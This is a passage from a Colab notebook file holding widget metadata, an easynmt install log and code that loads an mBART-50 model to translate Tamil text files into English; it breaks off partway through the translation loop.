"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"3cc33b5d60f641d5bc81eb6f60bfcd1e": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"847c55b3901f4601803dd31828cffc93": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"3b558d4bff2241ad949cfe4b27000ff8": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HBoxModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HBoxView",
"_dom_classes": [],
"_model_name": "HBoxModel",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.5.0",
"box_style": "",
"layout": "IPY_MODEL_8488584c8f814eb88197cbcf5eaf8487",
"_model_module": "@jupyter-widgets/controls",
"children": [
"IPY_MODEL_29ca8786126e4e9b897de5426ec009a9",
"IPY_MODEL_fde487b2fd4b4095991e408a24e81042",
"IPY_MODEL_fe982e314fba4aad95092dd54983f300"
]
}
},
"8488584c8f814eb88197cbcf5eaf8487": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"29ca8786126e4e9b897de5426ec009a9": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_33f2761b5013498e8333785833ea668d",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": "Downloading: 100%",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_040fc5c9d53746928e21663d44ee5187"
}
},
"fde487b2fd4b4095991e408a24e81042": {
"model_module": "@jupyter-widgets/controls",
"model_name": "FloatProgressModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "ProgressView",
"style": "IPY_MODEL_3ee1821930ce4279a28c771ae06d0acf",
"_dom_classes": [],
"description": "",
"_model_name": "FloatProgressModel",
"bar_style": "success",
"max": 5069051,
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": 5069051,
"_view_count": null,
"_view_module_version": "1.5.0",
"orientation": "horizontal",
"min": 0,
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_be27dd7477bc45c1a98fb723a236937b"
}
},
"fe982e314fba4aad95092dd54983f300": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_b4f4ec01371442d3a50a552e5ed2cff2",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": " 5.07M/5.07M [00:00<00:00, 24.8MB/s]",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_0a4bb6df135e42148a838620d7ac36be"
}
},
"33f2761b5013498e8333785833ea668d": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"040fc5c9d53746928e21663d44ee5187": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"3ee1821930ce4279a28c771ae06d0acf": {
"model_module": "@jupyter-widgets/controls",
"model_name": "ProgressStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "ProgressStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"bar_color": null,
"_model_module": "@jupyter-widgets/controls"
}
},
"be27dd7477bc45c1a98fb723a236937b": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"b4f4ec01371442d3a50a552e5ed2cff2": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"0a4bb6df135e42148a838620d7ac36be": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"1b3b94e8b9f1485f920956b3d80a187c": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HBoxModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HBoxView",
"_dom_classes": [],
"_model_name": "HBoxModel",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.5.0",
"box_style": "",
"layout": "IPY_MODEL_af8d9db3bf404a29975ce2dc0dfcfb4f",
"_model_module": "@jupyter-widgets/controls",
"children": [
"IPY_MODEL_87d6049157324e878cac7021fbf6e218",
"IPY_MODEL_e3420824fef140b1b45da3823e167cd9",
"IPY_MODEL_41dbf83a749346738f8a671e196e5a1e"
]
}
},
"af8d9db3bf404a29975ce2dc0dfcfb4f": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"87d6049157324e878cac7021fbf6e218": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_32feb77b17fb4c75a4b93ab17972872e",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": "Downloading: 100%",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_289662f6aa6946f08613ce07855e9b8d"
}
},
"e3420824fef140b1b45da3823e167cd9": {
"model_module": "@jupyter-widgets/controls",
"model_name": "FloatProgressModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "ProgressView",
"style": "IPY_MODEL_389acd5078e64ed592145f344da8fc98",
"_dom_classes": [],
"description": "",
"_model_name": "FloatProgressModel",
"bar_style": "success",
"max": 649,
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": 649,
"_view_count": null,
"_view_module_version": "1.5.0",
"orientation": "horizontal",
"min": 0,
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_34c6f99ff0854c4da84e56c03acceebf"
}
},
"41dbf83a749346738f8a671e196e5a1e": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_389fd8956d6d4747ba71d510f19b1d1c",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": " 649/649 [00:00<00:00, 9.66kB/s]",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_bb7153ca8bdd4c7293f20a8373b8156b"
}
},
"32feb77b17fb4c75a4b93ab17972872e": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"289662f6aa6946f08613ce07855e9b8d": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"389acd5078e64ed592145f344da8fc98": {
"model_module": "@jupyter-widgets/controls",
"model_name": "ProgressStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "ProgressStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"bar_color": null,
"_model_module": "@jupyter-widgets/controls"
}
},
"34c6f99ff0854c4da84e56c03acceebf": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"389fd8956d6d4747ba71d510f19b1d1c": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"bb7153ca8bdd4c7293f20a8373b8156b": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
}
}
}
},
"cells": [
{
"cell_type": "markdown",
"metadata": {
"id": "view-in-github",
"colab_type": "text"
},
"source": [
"<a href=\"https://colab.research.google.com/github/samyuktha-12/Aug2021-contest/blob/main/final.py\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>"
]
},
{
"cell_type": "code",
"metadata": {
"colab": {
"base_uri": "https://localhost:8080/"
},
"id": "eiR1x34Spo8W",
"outputId": "f2f04ad1-f77b-4942-8ff2-b9dbd14a802a"
},
"source": [
"pip install easynmt"
],
"execution_count": 1,
"outputs": [
{
"output_type": "stream",
"text": [
"Collecting easynmt\n",
" Downloading EasyNMT-2.0.1.tar.gz (14 kB)\n",
"Requirement already satisfied: tqdm in /usr/local/lib/python3.7/dist-packages (from easynmt) (4.62.0)\n",
"Collecting transformers<5,>=4.4\n",
" Downloading transformers-4.9.2-py3-none-any.whl (2.6 MB)\n",
"\u001b[K |████████████████████████████████| 2.6 MB 11.6 MB/s \n",
"\u001b[?25hRequirement already satisfied: torch>=1.6.0 in /usr/local/lib/python3.7/dist-packages (from easynmt) (1.9.0+cu102)\n",
"Requirement already satisfied: numpy in /usr/local/lib/python3.7/dist-packages (from easynmt) (1.19.5)\n",
"Requirement already satisfied: nltk in /usr/local/lib/python3.7/dist-packages (from easynmt) (3.2.5)\n",
"Collecting sentencepiece\n",
" Downloading sentencepiece-0.1.96-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (1.2 MB)\n",
"\u001b[K |████████████████████████████████| 1.2 MB 34.5 MB/s \n",
"\u001b[?25hCollecting fasttext\n",
" Downloading fasttext-0.9.2.tar.gz (68 kB)\n",
"\u001b[K |████████████████████████████████| 68 kB 6.7 MB/s \n",
"\u001b[?25hRequirement already satisfied: typing-extensions in /usr/local/lib/python3.7/dist-packages (from torch>=1.6.0->easynmt) (3.7.4.3)\n",
"Collecting sacremoses\n",
" Downloading sacremoses-0.0.45-py3-none-any.whl (895 kB)\n",
"\u001b[K |████████████████████████████████| 895 kB 48.6 MB/s \n",
"\u001b[?25hRequirement already satisfied: filelock in /usr/local/lib/python3.7/dist-packages (from transformers<5,>=4.4->easynmt) (3.0.12)\n",
"Requirement already satisfied: regex!=2019.12.17 in /usr/local/lib/python3.7/dist-packages (from transformers<5,>=4.4->easynmt) (2019.12.20)\n",
"Collecting pyyaml>=5.1\n",
" Downloading PyYAML-5.4.1-cp37-cp37m-manylinux1_x86_64.whl (636 kB)\n",
"\u001b[K |████████████████████████████████| 636 kB 51.9 MB/s \n",
"\u001b[?25hCollecting tokenizers<0.11,>=0.10.1\n",
" Downloading tokenizers-0.10.3-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl (3.3 MB)\n",
"\u001b[K |████████████████████████████████| 3.3 MB 39.7 MB/s \n",
"\u001b[?25hRequirement already satisfied: requests in /usr/local/lib/python3.7/dist-packages (from transformers<5,>=4.4->easynmt) (2.23.0)\n",
"Collecting huggingface-hub==0.0.12\n",
" Downloading huggingface_hub-0.0.12-py3-none-any.whl (37 kB)\n",
"Requirement already satisfied: packaging in /usr/local/lib/python3.7/dist-packages (from transformers<5,>=4.4->easynmt) (21.0)\n",
"Requirement already satisfied: importlib-metadata in /usr/local/lib/python3.7/dist-packages (from transformers<5,>=4.4->easynmt) (4.6.4)\n",
"Requirement already satisfied: pyparsing>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging->transformers<5,>=4.4->easynmt) (2.4.7)\n",
"Collecting pybind11>=2.2\n",
" Using cached pybind11-2.7.1-py2.py3-none-any.whl (200 kB)\n",
"Requirement already satisfied: setuptools>=0.7.0 in /usr/local/lib/python3.7/dist-packages (from fasttext->easynmt) (57.4.0)\n",
"Requirement already satisfied: zipp>=0.5 in /usr/local/lib/python3.7/dist-packages (from importlib-metadata->transformers<5,>=4.4->easynmt) (3.5.0)\n",
"Requirement already satisfied: six in /usr/local/lib/python3.7/dist-packages (from nltk->easynmt) (1.15.0)\n",
"Requirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests->transformers<5,>=4.4->easynmt) (2021.5.30)\n",
"Requirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests->transformers<5,>=4.4->easynmt) (1.24.3)\n",
"Requirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests->transformers<5,>=4.4->easynmt) (2.10)\n",
"Requirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests->transformers<5,>=4.4->easynmt) (3.0.4)\n",
"Requirement already satisfied: click in /usr/local/lib/python3.7/dist-packages (from sacremoses->transformers<5,>=4.4->easynmt) (7.1.2)\n",
"Requirement already satisfied: joblib in /usr/local/lib/python3.7/dist-packages (from sacremoses->transformers<5,>=4.4->easynmt) (1.0.1)\n",
"Building wheels for collected packages: easynmt, fasttext\n",
" Building wheel for easynmt (setup.py) ... \u001b[?25l\u001b[?25hdone\n",
" Created wheel for easynmt: filename=EasyNMT-2.0.1-py3-none-any.whl size=15446 sha256=504bb20229ab8caf87c5e681e2c8e9e23fb370a1b99cb45b14c839e7ed4eae8f\n",
" Stored in directory: /root/.cache/pip/wheels/fb/42/fb/b7711d3296456d5f74e6e265dbdb0e3142158f1bb50382caef\n",
" Building wheel for fasttext (setup.py) ... \u001b[?25l\u001b[?25hdone\n",
" Created wheel for fasttext: filename=fasttext-0.9.2-cp37-cp37m-linux_x86_64.whl size=3095031 sha256=a6597590785eb05f6b4e70fe03ceddb5edec6ccfd12ad4c0b9abf3ae455c1f3e\n",
" Stored in directory: /root/.cache/pip/wheels/4e/ca/bf/b020d2be95f7641801a6597a29c8f4f19e38f9c02a345bab9b\n",
"Successfully built easynmt fasttext\n",
"Installing collected packages: tokenizers, sacremoses, pyyaml, pybind11, huggingface-hub, transformers, sentencepiece, fasttext, easynmt\n",
" Attempting uninstall: pyyaml\n",
" Found existing installation: PyYAML 3.13\n",
" Uninstalling PyYAML-3.13:\n",
" Successfully uninstalled PyYAML-3.13\n",
"Successfully installed easynmt-2.0.1 fasttext-0.9.2 huggingface-hub-0.0.12 pybind11-2.7.1 pyyaml-5.4.1 sacremoses-0.0.45 sentencepiece-0.1.96 tokenizers-0.10.3 transformers-4.9.2\n"
],
"name": "stdout"
}
]
},
{
"cell_type": "code",
"metadata": {
"id": "UdsEN49Dp9Bj",
"colab": {
"base_uri": "https://localhost:8080/",
"height": 194,
"referenced_widgets": [
"6389fd3f3dc44050a610f69ab5e6a180",
"e86b2bbb520d4af990e84769814bbea5",
"42cacbc4410c4cd5861b324e9122fff7",
"ee6e111cae584dccb59e4a18fe5996e9",
"a64dcbd7f61c48dfa7d6fdd68d8c1758",
"8cd6b59399bb4f6b9419273713208fe2",
"11b917db556441efb01f932916060f0b",
"ef5d24a03aca43a1ae8a12e60a6149f0",
"156c24ba6f3c40a8aa7cbe915e1c5ed5",
"0a80dd64f7454aad8e249a57f13b7cf5",
"6408458000104746a888b5b7d1bb3992",
"d13dbb8559ba40a9a2f9dc7f0f5ea40d",
"f51970b3c1c549a69c51de95909e2105",
"6f57dcc2e6514dc593020a36a812dd2d",
"18975982ec1e4de8b4f0c665364926ba",
"7fbfeabe51a14620a520cb5cbba15945",
"dead2cfeeb9541e6b63a3e17327b8b85",
"6091e5ed880b4342aeee6fab8ee77dad",
"730d7b36b5254c1a9a6e97d429f7c083",
"d41435a1cc8d49119664466716ac5a9c",
"5ddb070811d04b2891ffaaaff381cc1c",
"609284e60209444fb1a86f5d803d16b1",
"d8ddbf1f4d33471cbb4a45f2a82c830e",
"0ded282a4598481db2831db11c45cc06",
"0e98a3fb81be4eb7be56f6c54f3453eb",
"1ad806b735cb4b7b83b63dfff1009cb1",
"877fdb214729497c8756a82ff97208f2",
"17dea81fe42a4d31b5239dec9cfbf446",
"6583cc2d5bb0439e8c3d6f4d607dfb7e",
"a8bc0bade21b4715a5dc62594a16d0c9",
"6e9b9d7ca93540bba92c33b4fd9f295e",
"3cc33b5d60f641d5bc81eb6f60bfcd1e",
"847c55b3901f4601803dd31828cffc93",
"3b558d4bff2241ad949cfe4b27000ff8",
"8488584c8f814eb88197cbcf5eaf8487",
"29ca8786126e4e9b897de5426ec009a9",
"fde487b2fd4b4095991e408a24e81042",
"fe982e314fba4aad95092dd54983f300",
"33f2761b5013498e8333785833ea668d",
"040fc5c9d53746928e21663d44ee5187",
"3ee1821930ce4279a28c771ae06d0acf",
"be27dd7477bc45c1a98fb723a236937b",
"b4f4ec01371442d3a50a552e5ed2cff2",
"0a4bb6df135e42148a838620d7ac36be",
"1b3b94e8b9f1485f920956b3d80a187c",
"af8d9db3bf404a29975ce2dc0dfcfb4f",
"87d6049157324e878cac7021fbf6e218",
"e3420824fef140b1b45da3823e167cd9",
"41dbf83a749346738f8a671e196e5a1e",
"32feb77b17fb4c75a4b93ab17972872e",
"289662f6aa6946f08613ce07855e9b8d",
"389acd5078e64ed592145f344da8fc98",
"34c6f99ff0854c4da84e56c03acceebf",
"389fd8956d6d4747ba71d510f19b1d1c",
"bb7153ca8bdd4c7293f20a8373b8156b"
]
},
"outputId": "6cd9ab41-fbda-4e02-bf46-cf887f2eaae3"
},
"source": [
"from easynmt import EasyNMT\n",
"model = EasyNMT('mbart50_m2m')"
],
"execution_count": 2,
"outputs": [
{
"output_type": "stream",
"text": [
"100%|██████████| 24.9k/24.9k [00:00<00:00, 1.07MB/s]\n"
],
"name": "stderr"
},
{
"output_type": "display_data",
"data": {
"application/vnd.jupyter.widget-view+json": {
"model_id": "6389fd3f3dc44050a610f69ab5e6a180",
"version_minor": 0,
"version_major": 2
},
"text/plain": [
"Downloading: 0%| | 0.00/1.43k [00:00<?, ?B/s]"
]
},
"metadata": {}
},
{
"output_type": "display_data",
"data": {
"application/vnd.jupyter.widget-view+json": {
"model_id": "d13dbb8559ba40a9a2f9dc7f0f5ea40d",
"version_minor": 0,
"version_major": 2
},
"text/plain": [
"Downloading: 0%| | 0.00/2.44G [00:00<?, ?B/s]"
]
},
"metadata": {}
},
{
"output_type": "display_data",
"data": {
"application/vnd.jupyter.widget-view+json": {
"model_id": "d8ddbf1f4d33471cbb4a45f2a82c830e",
"version_minor": 0,
"version_major": 2
},
"text/plain": [
"Downloading: 0%| | 0.00/529 [00:00<?, ?B/s]"
]
},
"metadata": {}
},
{
"output_type": "display_data",
"data": {
"application/vnd.jupyter.widget-view+json": {
"model_id": "3b558d4bff2241ad949cfe4b27000ff8",
"version_minor": 0,
"version_major": 2
},
"text/plain": [
"Downloading: 0%| | 0.00/5.07M [00:00<?, ?B/s]"
]
},
"metadata": {}
},
{
"output_type": "display_data",
"data": {
"application/vnd.jupyter.widget-view+json": {
"model_id": "1b3b94e8b9f1485f920956b3d80a187c",
"version_minor": 0,
"version_major": 2
},
"text/plain": [
"Downloading: 0%| | 0.00/649 [00:00<?, ?B/s]"
]
},
"metadata": {}
}
]
},
{
"cell_type": "code",
"metadata": {
"id": "_uAO2hKO7a_r"
},
"source": [
"#create a folder tamil_files\n",
"for ind in range(22,32):\n",
" tamil_open = open(f\"/content/tamil_files/{ind} - tam.txt\",'r')\n",
"\n",
" t_read = tamil_open.readlines()\n",
" ta_sent=[]\n",
" for i in range(len(t_read)):\n",
" if t_read[i]!='\\n':\n",
" ta_sent.append(t_read[i].rstrip(\"\\n\"))\n",
" \n",
" max_len_split=[]\n",
" translate=[]\n",
" for i in range(len(ta_sent)):\n",
" k=ta_sent[i]\n",
" if len(k)<723:\n",
" translate.append(model.translate(k,target_lang='en'))\n",
" if len(k)>=723:\n",
" k=k.split()\n",
" max_len_split.append(''.join(k[:len(k)//2]))\n",
